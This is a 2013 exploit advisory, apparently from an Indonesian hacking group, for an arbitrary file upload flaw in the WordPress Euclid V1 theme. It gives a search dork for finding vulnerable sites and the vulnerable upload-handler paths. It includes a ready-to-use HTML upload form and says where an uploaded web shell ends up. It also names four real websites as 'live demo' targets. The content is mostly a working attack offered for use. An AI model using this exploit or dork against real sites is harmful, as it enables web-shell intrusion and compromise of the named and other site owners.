Wordpress Euclid V1 Themes CSRF File Upload Vulnerability

1. #Title : Wordpress Euclid V1 Themes CSRF File Upload Vulnerability
2.  
3. #Author : DevilScreaM
4.  
5. #Date : 11/17/2013 - 17 November 2013
6.  
7. #Category : Web Applications
8.  
9. #Type : PHP
10.  
11. #Version : 1.x.x
12.  
13. #Vendor : http://freelancewp.com
14.  
15. #Download : http://freelancewp.com/wordpress-theme/euclid/
16.  
17. #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
18. Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
19.  
20. #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
21.  
22. #Tested : Mozila, Chrome, Opera -> Windows & Linux
23.  
24. #Vulnerabillity : CSRF
25.  
26. #Dork :
27.  
28. inurl:wp-content/themes/euclid_v1
29.  
30.  
31. CSRF File Upload Vulnerability
32.  
33. Exploit & POC :
34.  
35. http://site-target/wp-content/themes/euclid/functions/upload-handler.php
36. http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php
37.  
38. Script :
39.  
40. <form enctype="multipart/form-data"
41. action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php" method="post">
42. Your File: <input name="uploadfile" type="file" /><br />
43. <input type="submit" value="upload" />
44. </form>
45.  
46.  
47. File Access :
48.  
49. http://site-target/uploads/[years]/[month]/your_shell.php
50.  
51. Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
52.  
53. Live Demo :
54.  
55. http://rapidmaintenanceuk.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php
56. http://cbaydeluxeresort.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php
57. http://abovethemoon.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php
58. http://education-maroc.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php